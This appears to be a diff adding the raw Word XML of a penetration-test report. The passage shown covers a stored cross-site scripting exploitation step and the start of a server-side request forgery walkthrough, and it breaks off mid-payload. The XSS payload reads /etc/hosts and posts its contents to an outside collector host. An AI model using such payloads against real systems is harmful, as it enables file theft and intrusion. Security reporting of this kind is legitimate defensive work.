+                  <wp:extent cx="1678189" cy="767443"/>
+                  <wp:effectExtent l="0" t="0" r="0" b="0"/>
+                  <wp:docPr id="7" name="Picture 7"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="7" name="Picture 7"/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId18"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="1702664" cy="778635"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:jc w:val="right"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:hyperlink w:anchor="_Proof_of_Concept_1" w:history="1">
+        <w:r>
+          <w:rPr>
+            <w:rStyle w:val="Hyperlink"/>
+            <w:lang w:eastAsia="zh-CN"/>
+          </w:rPr>
+          <w:t>Return to the main report</w:t>
+        </w:r>
+      </w:hyperlink>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading3"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:bookmarkStart w:id="52" w:name="_Exploitation_2"/>
+      <w:bookmarkEnd w:id="52"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>E</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>xploitation 2</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>T</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>he following step shows how stored cross-site</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> scripting can be exploited to fetch a file from the filesystem.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="786"/>
+        <w:gridCol w:w="4657"/>
+        <w:gridCol w:w="3576"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ayload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.onload</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> = function () {</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    var xhr2 = new </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>XMLHttpRequest</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>(</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.open("POST", "https://hermes.free.beeceptor.com");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">    xhr2.send("test=" + </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>this.responseText</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>);</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  };</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.open</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>("GET", "/etc/hosts");</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xhr.send</w:t>
+            </w:r>
+            <w:proofErr w:type="spellEnd"/>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>();</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;/script&gt;</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Su</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>bmitting this payload as an anonymous question gives the following response:</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:noProof/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:drawing>
+                <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="13C7EAE4" wp14:editId="2DBA9C89">
+                  <wp:extent cx="2128157" cy="1101812"/>
+                  <wp:effectExtent l="0" t="0" r="5715" b="3175"/>
+                  <wp:docPr id="8" name="Picture 8"/>
+                  <wp:cNvGraphicFramePr>
+                    <a:graphicFrameLocks xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" noChangeAspect="1"/>
+                  </wp:cNvGraphicFramePr>
+                  <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
+                    <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                      <pic:pic xmlns:pic="http://schemas.openxmlformats.org/drawingml/2006/picture">
+                        <pic:nvPicPr>
+                          <pic:cNvPr id="1" name=""/>
+                          <pic:cNvPicPr/>
+                        </pic:nvPicPr>
+                        <pic:blipFill>
+                          <a:blip r:embed="rId19"/>
+                          <a:stretch>
+                            <a:fillRect/>
+                          </a:stretch>
+                        </pic:blipFill>
+                        <pic:spPr>
+                          <a:xfrm>
+                            <a:off x="0" y="0"/>
+                            <a:ext cx="2196280" cy="1137081"/>
+                          </a:xfrm>
+                          <a:prstGeom prst="rect">
+                            <a:avLst/>
+                          </a:prstGeom>
+                        </pic:spPr>
+                      </pic:pic>
+                    </a:graphicData>
+                  </a:graphic>
+                </wp:inline>
+              </w:drawing>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:hint="eastAsia"/>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>S</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+        <w:t>ection 3 – Server-side request forgery exploitation walkthrough</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:lang w:eastAsia="zh-CN"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:tbl>
+      <w:tblPr>
+        <w:tblStyle w:val="TableGrid"/>
+        <w:tblW w:w="0" w:type="auto"/>
+        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
+      </w:tblPr>
+      <w:tblGrid>
+        <w:gridCol w:w="786"/>
+        <w:gridCol w:w="4657"/>
+        <w:gridCol w:w="3576"/>
+      </w:tblGrid>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>S</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>tep</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>P</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>ayload</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="3007" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>E</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>xplanation</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="846" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:jc w:val="center"/>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>1</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:w="5166" w:type="dxa"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:proofErr w:type="gramStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New" w:hint="eastAsia"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>!--</w:t>
+            </w:r>
+            <w:proofErr w:type="gramEnd"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> ssrf_1.html --&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>&lt;script&gt;</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">  var </w:t>
+            </w:r>
+            <w:proofErr w:type="spellStart"/>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
